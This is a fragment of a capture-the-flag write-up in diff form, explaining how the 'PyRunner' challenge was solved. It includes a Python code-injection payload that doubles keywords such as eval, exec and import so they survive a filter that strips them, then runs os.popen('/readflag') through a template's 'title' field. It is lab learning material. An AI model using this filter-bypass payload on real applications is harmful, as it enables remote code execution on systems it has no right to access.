Kair0s3/Rightup/2022/Dec/STF/PyRunner Writeup.md

 ",evevalal("exexecec('impimportort ooss'), ooss.popen('/readflag').read()"))#
 ```

-And sending/running it on the application gives us the flag!
+With that, we can send it as the `title` input field and running the template gives us the flag!

 ![](images/Pasted%20image%2020221205194656.png)